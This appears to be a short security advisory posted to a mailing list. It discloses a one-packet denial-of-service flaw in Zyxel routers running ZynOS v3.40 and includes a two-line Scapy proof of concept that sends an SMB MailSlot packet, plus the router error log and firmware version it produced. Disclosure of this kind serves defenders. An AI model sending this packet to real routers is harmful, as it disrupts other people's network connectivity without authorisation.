Hi to all, While playing in my home's network with Scapy I found a vulnerability affecting the wireless services offered by Zyxel routers with, at least, ZynOS v3.40. That's the unique model I tested. The exploit in question: ---------------------------------------------- """ ZynOS v3.40 One packet killer """ from scapy import sr, SMBMailSlot sr(SMBMailSlot(name="\\M")) ---------------------------------------------- After launching it you will found in the router's errlog a text like the following: 34 Sat Jan 01 00:00:13 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 37 Sat Jan 01 00:00:18 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 40 Sat Jan 01 00:00:23 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 42 Sat Jan 01 00:00:28 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 45 Sat Jan 01 00:00:35 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 46 Sat Jan 01 00:00:37 2000 PP0b WARN MPOA Link Down 48 Sat Jan 01 00:00:40 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 51 Sat Jan 01 00:00:49 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 54 Sat Jan 01 00:00:54 2000 PP15 WARN netMakeChannDial: err=-3001 rn_p=9483fbb0 57 Sat Jan 01 00:00:58 2000 PP0b WARN MPOA Link Up The following is the complete version: router> sys version ZyNOS version: V3.40(AHQ.0) | 05/01/2006 romRasSize: 2321890 system up time: 0:03:17 (4d3d ticks) bootbase version: V1.06 | 1/20/2006 Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. ______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y móviles desde 1 céntimo por minuto. http://es.voice.yahoo.com
